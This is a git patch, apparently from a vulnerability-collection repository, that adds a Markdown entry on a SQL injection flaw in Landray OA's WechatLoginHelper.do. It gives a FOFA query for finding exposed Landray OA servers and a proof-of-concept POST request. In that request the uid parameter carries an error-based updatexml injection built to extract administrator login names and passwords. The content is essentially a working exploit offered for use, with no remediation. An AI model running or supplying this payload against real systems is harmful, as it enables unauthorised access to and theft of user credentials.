From fc6c05d88897bbf4babd7784f3371cbe486155e2 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Wed, 28 Feb 2024 19:23:25 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=93=9D=E5=87=8COA-WechatLoginHelper?= =?UTF-8?q?.do=E5=AD=98=E5=9C=A8SQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md diff --git a/蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md b/蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md new file mode 100644 index 0000000..321eed4 --- /dev/null +++ b/蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞.md @@ -0,0 +1,19 @@ +## 蓝凌OA-WechatLoginHelper.do存在SQL注入漏洞 + +## fofa +``` +app="Landray-OA系统" +``` + +## poc +``` +POST /third/wechat/wechatLoginHelper.do HTTP/1.1 +Host: xxx.xxx.xxx.xxx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.850.132 Safari/537.36 +Content-Length: 254 +Connection: close +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip + +method=edit&openid=&nickname=&image=&uid=123'and updatexml(1,concat('~',(select concat('~',test.fdLoginName,'~',test.fdPassword,'~') from com.landray.kmss.sys.organization.model.SysOrgPerson test where test.fdLoginName like '%25admin12%25'),'~'),1)=1-- ' +```